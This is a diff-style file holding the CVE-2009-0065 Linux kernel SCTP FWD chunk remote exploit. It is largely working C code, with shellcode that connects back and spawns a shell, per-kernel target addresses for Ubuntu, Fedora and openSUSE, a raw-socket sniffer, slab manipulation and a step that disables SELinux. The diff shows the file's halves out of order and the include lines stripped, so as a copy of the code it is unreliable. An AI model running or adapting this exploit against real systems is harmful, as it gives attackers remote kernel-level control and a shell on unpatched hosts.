- generic_x86_64_shellcode,
- sizeof(generic_x86_64_shellcode) -1,
- __OFFSET_PORT_64,
- __OFFSET_HOST_64,
- ubuntu64_2_6_27_7_server_x86_64_vsys_shadow,
- generic_x86_64_jump,
- 6,
- generic_x86_64_patchjump,
- 8,
- 40,
- 96,
- 8,
- NULL,
- SLUB_ALLOCATOR
- },
- {
- "ubuntu64_intrepid-2.6.27-[9-last]-server",
- "(kernel 2.6.27-9 to the last unpatched kernel -- server)",
- generic_x86_64_shellcode,
- sizeof(generic_x86_64_shellcode) -1,
- __OFFSET_PORT_64,
- __OFFSET_HOST_64,
- ubuntu64_2_6_27_9tolast_server_x86_64_vsys_shadow,
- generic_x86_64_jump,
- 6,
- generic_x86_64_patchjump,
- 8,
- 40,
- 96,
- 8,
- NULL,
- SLUB_ALLOCATOR
- },
- {
- "ubuntu64_intrepid-2.6.27-[7-last]-generic",
- "(kernel 2.6.27-9 to the last unpatched kernel -- server)",
- generic_x86_64_shellcode,
- sizeof(generic_x86_64_shellcode) -1,
- __OFFSET_PORT_64,
- __OFFSET_HOST_64,
- ubuntu64_2_6_27_7tolast_generic_x86_64_vsys_shadow,
- generic_x86_64_jump,
- 6,
- generic_x86_64_patchjump,
- 8,
- 40,
- 96,
- 8,
- NULL,
- SLUB_ALLOCATOR
- },
- {
- "fedora64_10-2.6.25-117",
- "(fedora core 10 default installed kernel)",
- generic_x86_64_shellcode,
- sizeof(generic_x86_64_shellcode) -1,
- __OFFSET_PORT_64,
- __OFFSET_HOST_64,
- fedora64_10_default_kernel_x86_64_vsys_shadow,
- generic_x86_64_jump,
- 6,
- generic_x86_64_patchjump,
- 8,
- 40,
- 96,
- 8,
- fedora64_10_default_kernel_x86_64_selinux,
- SLUB_ALLOCATOR
- },
- {
- "opensuse64_11.1-2.6.27.7-9-default",
- "(opensuse 11.1 default installed kernel)",
- generic_x86_64_shellcode,
- sizeof(generic_x86_64_shellcode) -1,
- __OFFSET_PORT_64,
- __OFFSET_HOST_64,
- opensuse64_11_1_default_kernel_x86_64_vsys_shadow,
- generic_x86_64_jump,
- 6,
- generic_x86_64_patchjump,
- 8,
- 40,
- 256,
- 8,
- NULL,
- SLAB_ALLOCATOR
- }
-};
-
-
-
-/* modular arithmetic shift */
-#define __SHIFT_CHECK 0x7FFF
-static __u16 shift_0_to_7fff[3] = { 0x7FFF, 0xFFFE, 0x0000 };
-static __u16 shift_8000_to_ffff[3] = { 0xFFFF, 0x7FFE, 0x8000 };
-
-/* global streams obj */
-static __u16 streams[1000][2];
-
-/* get stream flow */
-static int build_stream(const void *data, __u32 size, __u16 fc)
-{
- int chunk_num,i,j,stnum=0;
- __u16 *p;
- __u16 *shift;
- if(size % 2)
- __fatal("[!!!] build_stream: data unaligned");
-
- memset(streams, 0x00, sizeof(streams));
-
- chunk_num = size / 2;
- p = (__u16*)data;
- for(i=0; isport = htons(sp);
- hdr->dport = htons(dp);
- hdr->vtag = htonl(vtag);
- hdr->checksum = 0;
- fwd = (struct sctp_chunk_fwd *)(hdr->chunks);
- fwd->type = SCTP_FWD;
- fwd->flags = 0;
- fwd->len = htons(4 + 4 + (streamlen * 4)); // chunk + ctsn + streams
- fwd->new_tsn = htonl(tsn+1);
-
- /* build stream */
- pstream = (__u16 *)((&(fwd->new_tsn)) + 1);
- for(i=0; ilen) + sizeof(*hdr);
- hdr->checksum = htonl(sctp_crc32c(__buff, (__u32)(*p_len)));
- return hdr;
-}
-
-
-
-/* this function gets VTAG/TSN bound with this socket pair */
-int raw_socket_engine(__u16 sp, __u16 sp2, __u16 dp,
- __u32 *tsn, __u32 *vtag, __u32 *tsn2, __u32 *vtag2)
-{
- char packet[1500];
- int p_len;
- void *end;
- struct sctp_hdr *hdr;
- struct sctp_chk *chk;
- __u32 tmp;
- __u16 psp,pdp;
- fd_set r;
- struct timeval tv;
-
- int raw_fd = socket(PF_INET, SOCK_RAW, IPPROTO_SCTP);
- if(raw_fd < 0)
- __fatal_perror("socket: RAW/SCTP");
-
-
- FD_ZERO(&r);
- FD_SET(raw_fd, &r);
- tv.tv_usec=0;
- tv.tv_sec=10;
-
- while(select(raw_fd + 1, &r, NULL,NULL,&tv) > 0)
- {
- p_len = read(raw_fd, packet, sizeof(packet));
- end = packet + p_len;
- hdr = (struct sctp_hdr *)(packet + sizeof(struct iphdr));
- if((void*)(((char *)hdr)+4) >= end)
- continue;
-
- /* check for chunk */
- chk = (struct sctp_chk *)(hdr->chunks);
- tmp = ntohl(*((__u32*)(chk->data)));
- psp = ntohs(hdr->sport);
- pdp = ntohs(hdr->dport);
-
- if(chk->type == SCTP_SACK)
- {
- if(psp == dp && pdp == sp)
- *tsn = tmp;
-
- if(psp == dp && pdp == sp2)
- *tsn2 = tmp;
- }
-
- if(chk->type == SCTP_INIT_ACK)
- {
- if(psp == dp && pdp == sp)
- *vtag = tmp;
-
- if(psp == dp && pdp == sp2)
- *vtag2 = tmp;
- }
-
- if(*vtag && *tsn && *vtag2 && *tsn2)
- break;
-
- FD_ZERO(&r);
- FD_SET(raw_fd, &r);
- tv.tv_usec=0;
- tv.tv_sec=10;
- }
-
- return 0;
-}
-
-/* global vars */
-static __u16 sport=0;
-static __u16 sport2=0;
-static __u32 vtag=0, vtag2=0;
-static __u32 tsn=0, tsn2=0;
-
-static struct sockaddr_in server_sctp;
-int raw_sctp=-1;
-
-#define STACK_SIZE 0x1000
-char clone_stack[STACK_SIZE*2];
-
-
-static void send_fwd_chunk(__u16 sp, __u16 dp, __u16 streams[][2],
- int streamlen, __u32 vtag, __u32 tsn)
-{
- int p_len=0, ret;
- void *packet = make_fwd_packet(sp, dp, vtag, tsn, streams, streamlen, &p_len);
- ret = sendto(raw_sctp, packet, p_len, 0, (struct sockaddr *)&server_sctp, sizeof(struct sockaddr_in));
- if(ret < 0)
- __fatal_perror("sendto: sending FWD chunk");
-
- free(packet);
-}
-
-
-
-static int clone_thread(void *p)
-{
- raw_socket_engine(sport, sport2, h.rport, &tsn, &vtag, &tsn2, &vtag2);
- return 0;
-}
-
-
-static int make_sctp_connection(__u16 sp, __u16 dp, int data)
-{
- struct sctp_initmsg msg;
- int ret,o=1,fd;
- socklen_t len_sctp=sizeof(struct sctp_initmsg);
- struct sockaddr_in s,c;
-
- fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);
- if(fd < 0)
- __fatal_perror("socket: sctp SOCK_STREAM");
-
- ret = setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o));
- if (ret < 0)
- __fatal_perror("setsockopt: SO_REUSEADDR");
-
-
- /* NOTE: here we assume server peer allocates 10 output streams (as default)
- * if the applciation behaves differently you must probe and change channels size
- * to get the correct slab */
-
- if(k->allocator_type == SLAB_ALLOCATOR) // if SLAB change channel size
- {
- getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp);
- msg.sinit_num_ostreams=50; // force 256 slab allocation
- msg.sinit_max_instreams=10;
- setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp);
- }
- else
- {
- getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp);
- msg.sinit_num_ostreams=10; // force 96 slab allocation
- msg.sinit_max_instreams=10;
- setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp);
- }
-
-
- if(sp)
- {
- c.sin_family = PF_INET;
- c.sin_port = htons(sp);
- c.sin_addr.s_addr = INADDR_ANY;
- ret = bind(fd, (struct sockaddr *)&c, sizeof(c));
- if(ret < 0)
- __fatal_perror("bind: sctp socket");
- }
-
- s.sin_family = PF_INET;
- s.sin_port = htons(dp);
- s.sin_addr.s_addr = inet_addr(h.rhost);
-
- ret = connect(fd, (struct sockaddr *)&s, sizeof(s));
- if(ret < 0)
- __fatal_perror("connect: sctp socket");
-
-
- /* send one byte of data to get correctly
- * TSN from raw socket (from SACK replies)
- */
- if(data)
- {
- ret = send(fd, "", 1, 0);
- if(ret < 0)
- __fatal_perror("send: sctp socket data");
- }
- return fd;
-}
-
-
-static void htons_streams(__u16 s[][2], int len)
-{
- int i;
- for(i=0; ivsyspatchjump, k->vsyspatchjumpsize, 0);
- if(ret < 0)
- __fatal("Error Building Streams...");
-
- htons_streams(streams, ret);
- send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2);
-
-}
-
-
-static void multiplex(int listenfd)
-{
- int ret,new_fd;
- fd_set r;
- struct timeval t;
- char buffer[1500];
-
-
- FD_ZERO(&r);
- FD_SET(listenfd, &r);
- t.tv_sec = 3;
- t.tv_usec = 0;
- __msg("[**] Waiting daemons executing gettimeofday().. this can take up to one minute...\n");
- __msg("[**] ..");
- fflush(stdout);
-
- while(select(listenfd+1, &r, NULL, NULL, &t) == 0)
- {
- printf("..");
- fflush(stdout);
- t.tv_sec = 3;
- t.tv_usec = 0;
- FD_ZERO(&r);
- FD_SET(listenfd, &r);
- }
- __msg("..\n");
-
- new_fd = accept(listenfd, NULL, 0);
- if(new_fd < 0)
- __fatal_perror("accept: listen fd");
-
-
- __msg("[**] Connected!\n");
- patchjump();
-
- close(listenfd);
-
- write(new_fd, "id\n", 3);
-
- FD_ZERO(&r);
- FD_SET(new_fd, &r);
- FD_SET(0, &r);
- while(select(new_fd+1, &r, NULL, NULL, NULL) > 0)
- {
- if(FD_ISSET(0, &r)) // read from stdin
- {
- ret = read(0, buffer, sizeof(buffer));
- if(ret < 0)
- __fatal_perror("read: from stdin");
- else
- ret = write(new_fd, buffer, ret);
- }
-
- if(FD_ISSET(new_fd, &r))
- {
- ret = read(new_fd, buffer, sizeof(buffer));
- if(!ret) {
- __msg("Endopoint closed the connection\n");
- break;
- }
- else if(ret > 0)
- {
- write(1, buffer, ret);
- }
- else
- __fatal_perror("read: from net");
- }
-
- FD_ZERO(&r);
- FD_SET(new_fd, &r);
- FD_SET(0, &r);
- }
-
-}
-
-
-/* needed when exploiting old SLAB */
-void swap_to_SLAB_chunk()
-{
- __u32 tmp;
- __u16 tmp16;
-
- tmp = tsn;
- tsn = tsn2;
- tsn2 = tmp;
-
- tmp = vtag;
- vtag = vtag2;
- vtag2 = tmp;
-
- tmp16 = sport;
- sport = sport2;
- sport2 = tmp16;
-}
-
-
-
-int main(int argc, char **argv)
-{
-
- int ret, fd, i, listenfd,o=1;
- struct sockaddr_in l;
- __u32 lh;
- __u16 lp;
-
- sctp_getopt(argc, argv);
-
- listenfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
- if(setsockopt(listenfd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o)) < 0)
- __fatal_perror("setsockopt: SO_REUSEADDR");
-
- l.sin_family = PF_INET;
- l.sin_port = htons(h.lport);
- l.sin_addr.s_addr = inet_addr(h.lhost);
- if(bind(listenfd, (struct sockaddr *)&l, sizeof(l)) < 0)
- __fatal_perror("bind: sock");
-
- if(listen(listenfd, 4) < 0)
- __fatal_perror("listen: sock");
-
-
- /* set connect back params */
- lh = inet_addr(h.lhost);
- lp = htons(h.lport);
- memcpy(k->scode + k->portoff, &lp, 2);
- memcpy(k->scode + k->hostoff, &lh, 4);
-
- raw_sctp = socket(PF_INET, SOCK_RAW, IPPROTO_SCTP);
- if(raw_sctp < 0)
- __fatal_perror("socket: RAW/SCTP montitor socket");
-
- server_sctp.sin_family = PF_INET;
- server_sctp.sin_port = htons(h.rport);
- server_sctp.sin_addr.s_addr = inet_addr(h.rhost);
-
- __msg("[**] Monitoring Network for TSN/VTAG pairs.. \n");
- ret = clone(clone_thread, clone_stack+STACK_SIZE-8, CLONE_VM|SIGCHLD, NULL);
- if(ret < 0)
- __fatal_perror("clone");
-
- sleep(1);
-
- __msg("[**] Start flushing slub cache...\n");
- for(i=0; i<=h.nconn; i++)
- {
- __u16 p = sport-(h.nconn-1)+i;
- if(p == sport || p== sport2)
- fd = make_sctp_connection(p, h.rport, 1);
- else
- fd = make_sctp_connection(sport-(h.nconn-1)+i, h.rport, 0);
-// usleep(10);
- }
-
-
- disable_abort();
- /* wait for monitoring engine */
- wait(NULL);
-
- if(k->allocator_type == SLAB_ALLOCATOR)
- swap_to_SLAB_chunk();
-
- if(vtag && tsn && vtag2 && tsn2)
- {
- __u32 acc;
-
- __msg_f("[**] Using TSN/VTAG pairs: (TSN: %x <=> VTAG: %x) / (TSN: %x <=> VTAG: %x)...\n", tsn, vtag, tsn2, vtag2);
- sleep(1);
-
- if(k->selinux)
- {
- __msg("[**] Overwriting neightboard sctp map..\n");
- acc = (k->slubsize - k->chunksize) / 2;
- ret = build_stream(k->selinux, k->ptrsize, acc);
- if(ret < 0)
- __fatal("Error Building Streams...");
-
- htons_streams(streams, ret);
- send_fwd_chunk(sport, h.rport, streams, ret, vtag, tsn);
-
- __msg("[**] Disabling Selinux Enforcing Mode..\n");
- ret = build_stream(__zero, 4, 0);
- if(ret < 0)
- __fatal("Error Building Streams...");
-
- htons_streams(streams, ret);
- send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2);
- }
-
- __msg("[**] Overwriting neightboard sctp map ......\n");
- acc = (k->slubsize - k->chunksize) / 2;
- ret = build_stream(k->vsysaddr, k->ptrsize, acc);
- if(ret < 0)
- __fatal("Error Building Streams...");
-
- htons_streams(streams, ret);
- send_fwd_chunk(sport, h.rport, streams, ret, vtag, tsn);
-
- __msg("[**] Overwriting vsyscall shadow map..\n");
- acc = 0x930 / 2;
- ret = build_stream(k->scode, k->scodesize, acc); //1176
- if(ret < 0)
- __fatal("Error Building Streams...");
-
- htons_streams(streams, ret);
- send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2);
-
- __msg("[**] Hijacking vsyscall shadow map..\n");
- ret = build_stream(k->vsysjump, k->vsysjumpsize, 0);
- if(ret < 0)
- __fatal("Error Building Streams...");
-
- htons_streams(streams, ret);
- send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2);
-
- sleep(1);
- }
- else
- __fatal("VTAG/TSN not found: network error");
-
-
- multiplex(listenfd);
- __msg("[**] Closing Connection... \n");
- return 0;
-}
-
-// milw0rm.com [2009-04-28]
+/* CVE-2009-0065 SCTP FWD Chunk Memory Corruption
+ * Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit
+ *
+ * coded by: sgrakkyu antifork.org
+ * http://kernelbof.blogspot.com
+ *
+ *
+ * NOTE: you need at least one sctp application bound on the target box
+ *
+ * Supported target:
+ * Ubuntu 7.04 x86_64 (2.6.20_15-17-generic / 2.6.20_17-server)
+ * Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)
+ * Ubuntu 8.10 x86_64 (2.6.27_7-10 geenric/server)
+ * Fedora Core 10 x86_64 (default installed kernel)
+ * OpenSuse 11.1 x86_64 (default installed kernel)
+ */
+
+
+
+
+#define _GNU_SOURCE
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define __OFFSET_PORT_64 62 // 92
+#define __OFFSET_HOST_64 64 // 94
+
+//#define __TARGET_SPORT 20000
+
+
+#ifndef __u8
+#define __u8 uint8_t
+#endif
+
+#ifndef __u16
+#define __u16 uint16_t
+#endif
+
+#ifndef __u32
+#define __u32 uint32_t
+#endif
+
+
+
+/* start crc routines: ripped from wireshark sources */
+#define SP_LEN 2
+#define DP_LEN 2
+#define VTAG_LEN 4
+#define CHK_LEN 4
+#define HEADER_LEN (SP_LEN + DP_LEN + VTAG_LEN + CHK_LEN)
+
+
+#define CRC32C(c,d) (c=(c>>8)^crc_c[(c^(d))&0xFF])
+static int32_t crc_c[256] =
+{
+0x00000000L, 0xF26B8303L, 0xE13B70F7L, 0x1350F3F4L,
+0xC79A971FL, 0x35F1141CL, 0x26A1E7E8L, 0xD4CA64EBL,
+0x8AD958CFL, 0x78B2DBCCL, 0x6BE22838L, 0x9989AB3BL,
+0x4D43CFD0L, 0xBF284CD3L, 0xAC78BF27L, 0x5E133C24L,
+0x105EC76FL, 0xE235446CL, 0xF165B798L, 0x030E349BL,
+0xD7C45070L, 0x25AFD373L, 0x36FF2087L, 0xC494A384L,
+0x9A879FA0L, 0x68EC1CA3L, 0x7BBCEF57L, 0x89D76C54L,
+0x5D1D08BFL, 0xAF768BBCL, 0xBC267848L, 0x4E4DFB4BL,
+0x20BD8EDEL, 0xD2D60DDDL, 0xC186FE29L, 0x33ED7D2AL,
+0xE72719C1L, 0x154C9AC2L, 0x061C6936L, 0xF477EA35L,
+0xAA64D611L, 0x580F5512L, 0x4B5FA6E6L, 0xB93425E5L,
+0x6DFE410EL, 0x9F95C20DL, 0x8CC531F9L, 0x7EAEB2FAL,
+0x30E349B1L, 0xC288CAB2L, 0xD1D83946L, 0x23B3BA45L,
+0xF779DEAEL, 0x05125DADL, 0x1642AE59L, 0xE4292D5AL,
+0xBA3A117EL, 0x4851927DL, 0x5B016189L, 0xA96AE28AL,
+0x7DA08661L, 0x8FCB0562L, 0x9C9BF696L, 0x6EF07595L,
+0x417B1DBCL, 0xB3109EBFL, 0xA0406D4BL, 0x522BEE48L,
+0x86E18AA3L, 0x748A09A0L, 0x67DAFA54L, 0x95B17957L,
+0xCBA24573L, 0x39C9C670L, 0x2A993584L, 0xD8F2B687L,
+0x0C38D26CL, 0xFE53516FL, 0xED03A29BL, 0x1F682198L,
+0x5125DAD3L, 0xA34E59D0L, 0xB01EAA24L, 0x42752927L,
+0x96BF4DCCL, 0x64D4CECFL, 0x77843D3BL, 0x85EFBE38L,
+0xDBFC821CL, 0x2997011FL, 0x3AC7F2EBL, 0xC8AC71E8L,
+0x1C661503L, 0xEE0D9600L, 0xFD5D65F4L, 0x0F36E6F7L,
+0x61C69362L, 0x93AD1061L, 0x80FDE395L, 0x72966096L,
+0xA65C047DL, 0x5437877EL, 0x4767748AL, 0xB50CF789L,
+0xEB1FCBADL, 0x197448AEL, 0x0A24BB5AL, 0xF84F3859L,
+0x2C855CB2L, 0xDEEEDFB1L, 0xCDBE2C45L, 0x3FD5AF46L,
+0x7198540DL, 0x83F3D70EL, 0x90A324FAL, 0x62C8A7F9L,
+0xB602C312L, 0x44694011L, 0x5739B3E5L, 0xA55230E6L,
+0xFB410CC2L, 0x092A8FC1L, 0x1A7A7C35L, 0xE811FF36L,
+0x3CDB9BDDL, 0xCEB018DEL, 0xDDE0EB2AL, 0x2F8B6829L,
+0x82F63B78L, 0x709DB87BL, 0x63CD4B8FL, 0x91A6C88CL,
+0x456CAC67L, 0xB7072F64L, 0xA457DC90L, 0x563C5F93L,
+0x082F63B7L, 0xFA44E0B4L, 0xE9141340L, 0x1B7F9043L,
+0xCFB5F4A8L, 0x3DDE77ABL, 0x2E8E845FL, 0xDCE5075CL,
+0x92A8FC17L, 0x60C37F14L, 0x73938CE0L, 0x81F80FE3L,
+0x55326B08L, 0xA759E80BL, 0xB4091BFFL, 0x466298FCL,
+0x1871A4D8L, 0xEA1A27DBL, 0xF94AD42FL, 0x0B21572CL,
+0xDFEB33C7L, 0x2D80B0C4L, 0x3ED04330L, 0xCCBBC033L,
+0xA24BB5A6L, 0x502036A5L, 0x4370C551L, 0xB11B4652L,
+0x65D122B9L, 0x97BAA1BAL, 0x84EA524EL, 0x7681D14DL,
+0x2892ED69L, 0xDAF96E6AL, 0xC9A99D9EL, 0x3BC21E9DL,
+0xEF087A76L, 0x1D63F975L, 0x0E330A81L, 0xFC588982L,
+0xB21572C9L, 0x407EF1CAL, 0x532E023EL, 0xA145813DL,
+0x758FE5D6L, 0x87E466D5L, 0x94B49521L, 0x66DF1622L,
+0x38CC2A06L, 0xCAA7A905L, 0xD9F75AF1L, 0x2B9CD9F2L,
+0xFF56BD19L, 0x0D3D3E1AL, 0x1E6DCDEEL, 0xEC064EEDL,
+0xC38D26C4L, 0x31E6A5C7L, 0x22B65633L, 0xD0DDD530L,
+0x0417B1DBL, 0xF67C32D8L, 0xE52CC12CL, 0x1747422FL,
+0x49547E0BL, 0xBB3FFD08L, 0xA86F0EFCL, 0x5A048DFFL,
+0x8ECEE914L, 0x7CA56A17L, 0x6FF599E3L, 0x9D9E1AE0L,
+0xD3D3E1ABL, 0x21B862A8L, 0x32E8915CL, 0xC083125FL,
+0x144976B4L, 0xE622F5B7L, 0xF5720643L, 0x07198540L,
+0x590AB964L, 0xAB613A67L, 0xB831C993L, 0x4A5A4A90L,
+0x9E902E7BL, 0x6CFBAD78L, 0x7FAB5E8CL, 0x8DC0DD8FL,
+0xE330A81AL, 0x115B2B19L, 0x020BD8EDL, 0xF0605BEEL,
+0x24AA3F05L, 0xD6C1BC06L, 0xC5914FF2L, 0x37FACCF1L,
+0x69E9F0D5L, 0x9B8273D6L, 0x88D28022L, 0x7AB90321L,
+0xAE7367CAL, 0x5C18E4C9L, 0x4F48173DL, 0xBD23943EL,
+0xF36E6F75L, 0x0105EC76L, 0x12551F82L, 0xE03E9C81L,
+0x34F4F86AL, 0xC69F7B69L, 0xD5CF889DL, 0x27A40B9EL,
+0x79B737BAL, 0x8BDCB4B9L, 0x988C474DL, 0x6AE7C44EL,
+0xBE2DA0A5L, 0x4C4623A6L, 0x5F16D052L, 0xAD7D5351L,
+};
+
+static __u32 sctp_crc32c(const unsigned char* buf, __u32 len)
+{
+ __u32 i;
+ __u32 crc32 = ~0U;
+ __u32 r;
+ unsigned char b0,b1,b2,b3;
+
+ for (i = 0; i < SP_LEN + DP_LEN + VTAG_LEN; i++)
+ {
+ CRC32C(crc32, buf[i]);
+ }
+ CRC32C(crc32, 0);
+ CRC32C(crc32, 0);
+ CRC32C(crc32, 0);
+ CRC32C(crc32, 0);
+ for (i = HEADER_LEN; i < len; i++)
+ {
+ CRC32C(crc32, buf[i]);
+ }
+ r = ~crc32;
+
+ b0 = r & 0xff;
+ b1 = (r>>8) & 0xff;
+ b2 = (r>>16) & 0xff;
+ b3 = (r>>24) & 0xff;
+ crc32 = ((b0 << 24) | (b1 << 16) | (b2 << 8) | b3);
+ 
return ( crc32 ); +} +/* end crc routines */ + +static char generic_x86_64_shellcode[] = +// prolog +"\x90\x53\x48\x31\xc0\xb0\x66\x0f\x05\x48\x31\xdb" +"\x48\x39\xd8\x75\x0f\x48\x31\xc0\xb0\x02\xcd\x80" +"\x48\x31\xdb\x48\x39\xc3\x74\x09\x5b\x48\x31\xc0" +"\xb0\x60\x0f\x05\xc3" +// connect back +"\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58" +"\x0f\x05\x48\x97\x50\x48\xb9\x02\x00\x0d\x05\x7f" +"\x00\x00\x01\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a" +"\x58\x0f\x05\x48\x31\xdb\x48\x39\xc3\x74\x07\x48" +"\x31\xc0\xb0\xe7\x0f\x05\x90" +"\x6a\x03\x5e\x6a\x21\x58\x48\xff\xce\x0f\x05\x75" +"\xf6\x48\xbb\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48" +"\xf7\xd3\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48" +"\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05\x48\x31\xc0" +"\xb0\xe7\x0f\x05" +; + +static const char __zero[4] = {0x00, 0x00, 0x00, 0x00}; +//static char __force_crash[] = "\x41\x41\x41\x41\x41\x41\x41\x41"; + +static char generic_x86_64_patchjump[] = "\x48\x31\xc0\xb0\x60\x0f\x05\xc3"; +static char generic_x86_64_jump[] = "\xe9\x2b\x09\x00\x00\x90"; + +/* ubuntu 7.04 */ +static char ubuntu64_2_6_20_15to17_generic_x86_64_vsys_shadow[] = "\x00\x40\x56\x80\xFF\xFF\xFF\xFF"; +static char ubuntu64_2_6_20_17_server_x86_64_vsys_shadow[] = "\x00\x90\x5B\x80\xFF\xFF\xFF\xFF"; + +/* ubuntu 8.04 */ +static char ubuntu64_2_6_24_23_last_server_x86_64_vsys_shadow[] = "\x00\x50\x62\x80\xFF\xFF\xFF\xFF"; +static char ubuntu64_2_6_24_19to22_server_x86_64_vsys_shadow[] = "\x00\x40\x62\x80\xFF\xFF\xFF\xFF"; +static char ubuntu64_2_6_24_16to18_server_x86_64_vsys_shadow[] = "\x00\x30\x62\x80\xFF\xFF\xFF\xFF"; + +static char ubuntu64_2_6_24_18to21_generic_x86_64_vsys_shadow[] = "\x00\x40\x5d\x80\xFF\xFF\xFF\xFF"; + +/* ubuntu 8.10 */ +static char ubuntu64_2_6_27_7_server_x86_64_vsys_shadow[] = "\x00\x30\x6f\x80\xFF\xFF\xFF\xFF"; +static char ubuntu64_2_6_27_9tolast_server_x86_64_vsys_shadow[] = "\x00\x40\x6f\x80\xFF\xFF\xFF\xFF"; + +static char ubuntu64_2_6_27_7tolast_generic_x86_64_vsys_shadow[] = 
"\x00\x40\x6f\x80\xFF\xFF\xFF\xFF"; + +/* fedora code 10 */ +static char fedora64_10_default_kernel_x86_64_vsys_shadow[] = "\x00\x10\x57\x81\xFF\xFF\xFF\xFF"; +static char fedora64_10_default_kernel_x86_64_selinux[] = "\x84\xE6\x7C\x81\xFF\xFF\xFF\xFF"; + +/* opensuse 11.1 */ +static char opensuse64_11_1_default_kernel_x86_64_vsys_shadow[]="\x00\x10\x8E\x80\xFF\xFF\xFF\xFF"; + + +#define __msg_f(format, args...) \ + do { fprintf(stdout, format, ## args); } while(0) + +#define __msg(msg) \ + do { fprintf(stdout, "%s", msg); } while(0) + +#define __fatal(msg) \ + do {fprintf(stderr, "%s", msg); exit(1);} while (0) + +#define __fatal_perror(msg) \ + do { perror(msg); exit(1); } while (0) + +enum { + SLAB_ALLOCATOR=0, + SLUB_ALLOCATOR=1 +}; + +typedef struct +{ + const char *name; + const char *info; + char *scode; + __u32 scodesize; + __u32 portoff; + __u32 hostoff; + const char *vsysaddr; + const char *vsysjump; + __u32 vsysjumpsize; + + const char *vsyspatchjump; + __u32 vsyspatchjumpsize; + + __u32 chunksize; + __u32 slubsize; + __u32 ptrsize; + + const char *selinux; + + int allocator_type; + +} kinfo; + +static kinfo *k; + +typedef struct +{ + const char* target; + const char* rhost; + const char* lhost; + __u16 rport; + __u16 lport; + + __u16 sport; // defines associations + __u16 nconn; + +} hinfo; + +static hinfo h = { NULL, NULL, NULL, 0, 0, 0, 600 }; + +static kinfo kernels[] = { + { + "ubuntu64_faisty-2.6.20-[15-17]-generic", + "(faisty: generic kernel)", + generic_x86_64_shellcode, + sizeof(generic_x86_64_shellcode) -1, + __OFFSET_PORT_64, + __OFFSET_HOST_64, + ubuntu64_2_6_20_15to17_generic_x86_64_vsys_shadow, + generic_x86_64_jump, + 6, + generic_x86_64_patchjump, + 8, + 40, + 256, + 8, + NULL, + SLAB_ALLOCATOR + }, + { + "ubuntu64_faisty-2.6.20-17-server", + "(faisty: server kernel - last 2.6.20-17 build)", + generic_x86_64_shellcode, + sizeof(generic_x86_64_shellcode) -1, + __OFFSET_PORT_64, + __OFFSET_HOST_64, + 
ubuntu64_2_6_20_17_server_x86_64_vsys_shadow, + generic_x86_64_jump, + 6, + generic_x86_64_patchjump, + 8, + 40, + 256, + 8, + NULL, + SLAB_ALLOCATOR + }, + { + "ubuntu64_hardy-2.6.24-[18-21]-generic", + "(kernel from 2.6.24-18 to kernel 2.6.24-21 -- generic)", + generic_x86_64_shellcode, + sizeof(generic_x86_64_shellcode) -1, + __OFFSET_PORT_64, + __OFFSET_HOST_64, + ubuntu64_2_6_24_18to21_generic_x86_64_vsys_shadow, + generic_x86_64_jump, + 6, + generic_x86_64_patchjump, + 8, + 40, + 96, + 8, + NULL, + SLUB_ALLOCATOR + }, + { + "ubuntu64_hardy_2.6.24-[16-18]-server", + "(kernel from 2.6.24-16 to 2.6.24-18 -- server)", + generic_x86_64_shellcode, + sizeof(generic_x86_64_shellcode) -1, + __OFFSET_PORT_64, + __OFFSET_HOST_64, + ubuntu64_2_6_24_16to18_server_x86_64_vsys_shadow, + generic_x86_64_jump, + 6, + generic_x86_64_patchjump, + 8, + 40, + 96, + 8, + NULL, + SLUB_ALLOCATOR + }, + { + "ubuntu64_hardy-2.6.24-[19-22]-server", + "(kernel from 2.6.24-19 to 2.6.24-22 -- server)", + generic_x86_64_shellcode, + sizeof(generic_x86_64_shellcode) -1, + __OFFSET_PORT_64, + __OFFSET_HOST_64, + ubuntu64_2_6_24_19to22_server_x86_64_vsys_shadow, + generic_x86_64_jump, + 6, + generic_x86_64_patchjump, + 8, + 40, + 96, + 8, + NULL, + SLUB_ALLOCATOR + }, + { + "ubuntu64_hardy-2.6.24-23-last-server", + "(last 2.6.24-23 kernel before patch -- server)", + generic_x86_64_shellcode, + sizeof(generic_x86_64_shellcode) -1, + __OFFSET_PORT_64, + __OFFSET_HOST_64, + ubuntu64_2_6_24_23_last_server_x86_64_vsys_shadow, + generic_x86_64_jump, + 6, + generic_x86_64_patchjump, + 8, + 40, + 96, + 8, + NULL, + SLUB_ALLOCATOR + }, + { + "ubuntu64_intrepid-2.6.27-7-server", + "(kernel 2.6.27-7 -- server)", + generic_x86_64_shellcode, + sizeof(generic_x86_64_shellcode) -1, + __OFFSET_PORT_64, + __OFFSET_HOST_64, + ubuntu64_2_6_27_7_server_x86_64_vsys_shadow, + generic_x86_64_jump, + 6, + generic_x86_64_patchjump, + 8, + 40, + 96, + 8, + NULL, + SLUB_ALLOCATOR + }, + { + 
